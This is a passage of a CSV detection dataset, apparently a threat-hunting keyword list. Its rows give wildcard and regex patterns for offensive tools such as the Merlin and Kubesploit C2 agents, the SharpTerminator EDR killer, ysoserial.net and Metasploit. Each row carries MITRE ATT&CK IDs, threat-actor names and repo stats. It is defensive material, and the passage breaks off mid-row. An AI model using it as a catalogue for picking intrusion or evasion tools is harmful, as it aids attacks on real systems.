"*merlinAgent-Windows-x64-*",".{0,1000}merlinAgent\-Windows\-x64\-.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51780" "*merlinAgent-Windows-x64.*",".{0,1000}merlinAgent\-Windows\-x64\..{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51781" "*merlinAgent-Windows-x64.exe*",".{0,1000}merlinAgent\-Windows\-x64\.exe.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","51782" "*merlinAgent-Windows-x64.exe*",".{0,1000}merlinAgent\-Windows\-x64\.exe\s.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51783" "*merlinAgent-Windows-x86.exe*",".{0,1000}merlinAgent\-Windows\-x86\.exe\s.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51784" "*merlin-c2.readthedocs.io*",".{0,1000}merlin\-c2\.readthedocs\.io.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51785" "*merlin-c2.readthedocs.io*",".{0,1000}merlin\-c2\.readthedocs\.io.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","51786" "*MerlinCheatSheet.pdf*",".{0,1000}MerlinCheatSheet\.pdf.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","51787" "*merlinHTTP.HTTP*",".{0,1000}merlinHTTP\.HTTP.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51788" 
"*merlinHTTP.JA3*",".{0,1000}merlinHTTP\.JA3.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51789" "*merlinHTTP.PARROT*",".{0,1000}merlinHTTP\.PARROT.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51790" "*merlinHTTP.WINHTTP*",".{0,1000}merlinHTTP\.WINHTTP.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51791" "*merlinHTTP.WININET*",".{0,1000}merlinHTTP\.WININET.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51792" "*merlinServer-*.7z*",".{0,1000}merlinServer\-.{0,1000}\.7z.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access 
Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51793" "*merlinServer-*.exe*",".{0,1000}merlinServer\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51794" "*merlinserver.go*",".{0,1000}merlinserver\.go.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","51795" "*merlinserver.go*",".{0,1000}merlinserver\.go.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51796" "*merlinserver_windows_x64.exe*",".{0,1000}merlinserver_windows_x64\.exe.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - 
TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","51797" "*merlinserver_windows_x64.exe*",".{0,1000}merlinserver_windows_x64\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51798" "*merlinServer-Darwin-x64.exe*",".{0,1000}merlinServer\-Darwin\-x64\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","#linux","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51799" "*merlinServer-Darwin-x64.exe*",".{0,1000}merlinServer\-Darwin\-x64\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","#linux","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51800" "*merlinServer-Linux*",".{0,1000}merlinServer\-Linux.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","#linux","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51801" "*merlinServer-Linux-x64.7z*",".{0,1000}merlinServer\-Linux\-x64\.7z.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","#linux","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51802" "*merlinServerLog.txt*",".{0,1000}merlinServerLog\.txt.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","51803" "*merlinServerLog.txt*",".{0,1000}merlinServerLog\.txt.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51804" "*merlinServer-Windows-x64.exe*",".{0,1000}merlinServer\-Windows\-x64\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51805" 
"*merlinServer-Windows-x64.exe*",".{0,1000}merlinServer\-Windows\-x64\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51806" "*mertdas/RedPersist*",".{0,1000}mertdas\/RedPersist.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","51807" "*mertdas/SharpIncrease*",".{0,1000}mertdas\/SharpIncrease.{0,1000}","offensive_tool_keyword","SharpIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/mertdas/SharpIncrease","1","1","N/A","N/A","6","2","148","30","2024-06-28T21:36:46Z","2023-03-14T23:35:32Z","51808" "*mertdas/SharpLDAP*",".{0,1000}mertdas\/SharpLDAP.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","N/A","8","1","0","1","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z","51809" "*mertdas/SharpTerminator*",".{0,1000}mertdas\/SharpTerminator.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation 
tool","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","10","4","341","66","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z","51810" "*Message Box created from HookChain*",".{0,1000}Message\sBox\screated\sfrom\sHookChain.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","N/A","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","51883" "*MessageBox.Show*Pwned*",".{0,1000}MessageBox\.Show.{0,1000}Pwned.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","51884" "*messagebox_reflective.dll*",".{0,1000}messagebox_reflective\.dll.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","51885" "*MessageBoxW(*""Stardust Socket Failed""*",".{0,1000}MessageBoxW\(.{0,1000}\""Stardust\sSocket\sFailed\"".{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","51886" "*MessageBoxW(*""Stardust Socket 
Initialization""*",".{0,1000}MessageBoxW\(.{0,1000}\""Stardust\sSocket\sInitialization\"".{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","51887" "*MessageBoxW(*""We are all made of Stardust!""*",".{0,1000}MessageBoxW\(.{0,1000}\""We\sare\sall\smade\sof\sStardust!\"".{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","51888" "*MessageDeobfuscation.exe*",".{0,1000}MessageDeobfuscation\.exe.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","51889" "*met_inject.py*",".{0,1000}met_inject\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential 
Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","51890" "*metagoofil*",".{0,1000}metagoofil.{0,1000}","offensive_tool_keyword","metagoofil","Metagoofil is a tool for extracting metadata of public documents (pdf.doc.xls.ppt..etc) available in the target websites. This information could be useful because you can get valid usernames. people names. for using later in bruteforce password attacks (vpn. ftp. webapps). the tool will also extract interesting paths of the documents. where we can get shared resources names. server names... etc.","T1213 - T1596 - T1083 - T1082","TA0007 - TA0009 - TA0004","N/A","N/A","Reconnaissance","https://github.com/laramies/metagoofi","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","51891" "*metame -i *.exe*",".{0,1000}metame\s\-i\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","metame","metame is a metamorphic code engine for arbitrary executables","T1027 - T1059.003 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/a0rtega/metame","1","0","N/A","N/A","N/A","6","580","88","2019-10-06T18:24:14Z","2016-08-07T13:56:57Z","51892" "*Metasploit*",".{0,1000}Metasploit.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit.
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51893" "*metasploit.exe*",".{0,1000}metasploit\.exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51894" "*metasploit.go*",".{0,1000}metasploit\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","51895" "*metasploit.rb*",".{0,1000}metasploit\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51896" "*metasploit/framework*",".{0,1000}metasploit\/framework.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51897" "*metasploit/peass.rb*",".{0,1000}metasploit\/peass\.rb.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","51898" "*metasploit_framework.rb*",".{0,1000}metasploit_framework\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51899" "*metasploit-framework*",".{0,1000}metasploit\-framework.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51900" "*metasploit-framework*",".{0,1000}metasploit\-framework.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://www.metasploit.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51901" "*metasploitframework*.msi*",".{0,1000}metasploitframework.{0,1000}\.msi.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
